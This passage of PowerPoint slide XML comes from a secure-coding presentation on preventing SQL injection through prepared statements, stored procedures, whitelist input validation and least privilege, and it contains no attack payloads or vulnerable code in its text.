                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Privilege</a:t>
            </a:r>
            <a:endParaRPr sz="3950">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1143000" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="385"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-180">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Also: </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-145">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Performing </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-65">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Whitelist </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Input </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-130">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Validation </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-365">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>as </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-305">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Secondary</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-330">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-245">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Defense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17378680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65"/>
              <a:t>Option</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-610"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-65"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-610"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-480"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-615"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-150"/>
              <a:t>Use</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-605"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-300"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-615"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-365"/>
              <a:t>Prepared</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-615"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-37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4752" y="2868888"/>
            <a:ext cx="5858510" cy="7296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600" spc="-350">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Code </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to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415">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQLi:</a:t>
            </a:r>
            <a:endParaRPr sz="4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2815" y="4125382"/>
            <a:ext cx="16709826" cy="3698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66210" y="7963881"/>
            <a:ext cx="15707994" cy="197294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4600" spc="-240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Spot </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the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300">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>issue?</a:t>
            </a:r>
            <a:endParaRPr sz="4600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" marR="5080" indent="-377190">
              <a:lnSpc>
                <a:spcPts val="4210"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="975"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1257300" algn="l"/>
                <a:tab pos="1257935" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-229">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>User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140">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>supplied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20">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-195">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-85">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>“cutomerName”</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-204">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> is</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-210">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-165">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>embedded</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-195">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-70">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>directly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15">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>into</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-200">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>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590">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQL  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-110">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>statement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1759521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65"/>
              <a:t>Option</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-610"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-65"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-610"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="1215"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-605"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-150"/>
              <a:t>Use</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-610"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-300"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-610"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-365"/>
              <a:t>Prepared</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-615"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-37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4752" y="2517764"/>
            <a:ext cx="17194530" cy="3980179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585"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-325">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-114">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>construction </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-685">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-125">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>statement </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-229">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-100">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>performed </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="20">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>two</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-720">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-220">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>steps:</a:t>
            </a:r>
            <a:endParaRPr sz="4600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1284605" marR="5080" indent="-377190">
              <a:lnSpc>
                <a:spcPts val="4190"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1010"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1285240" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-280">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-105">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>application </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-180">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>specifies </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-145">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>query’s </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-80">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>structure </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="25">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>with </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-160">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>placeholders </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-10">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-815">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>each </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-180">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>user  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-20">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:endParaRPr sz="3950">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1284605" indent="-377825">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="345"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1285240" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-280">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-105">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>application </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-180">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>specifies </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-85">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>content </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>each</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-730">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-130">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>placeholder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720715" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-350">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Code </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-110">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>vulnerable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50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-415">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQLi:</a:t>
            </a:r>
            <a:endParaRPr sz="4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2062" y="6883047"/>
            <a:ext cx="15471560" cy="3245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6659880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70"/>
              <a:t>Partial</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-670"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-240"/>
              <a:t>Options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6193" y="2552246"/>
            <a:ext cx="16287115" cy="7461884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3600" spc="-150" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Option </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-300" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>2: </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-145" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-140" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-190" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Stored</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-595" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-215" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Procedures</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" marR="287020" indent="-377190">
              <a:lnSpc>
                <a:spcPts val="3960"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="825"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1143000" algn="l"/>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-305">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-105">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>stored </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-114">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>procedure </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-175">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-265">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-120">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>batch </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-120">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>statements </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-125">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>grouped </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-60">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>together </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-155">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-105">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>stored </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-35">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-620">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-30">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-180">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>database</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="295"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1143000" algn="l"/>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Not </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-200">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>always </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-215">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>safe </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-25">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-525">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-55">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>injection, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-25">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>still </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>need </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>be </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-135">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>called </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-35">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-265">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-130">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>parameterized</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-580">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-180">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>way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6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600" spc="-150" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Option </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-300" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>3: </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-160" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Whitelist </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-145" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Input</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-450" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-175" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Validation</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="390"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1143000" algn="l"/>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-120">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Defining </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>what </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>values </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>are </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-100">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>authorized. </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-145">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Everything </a:t>
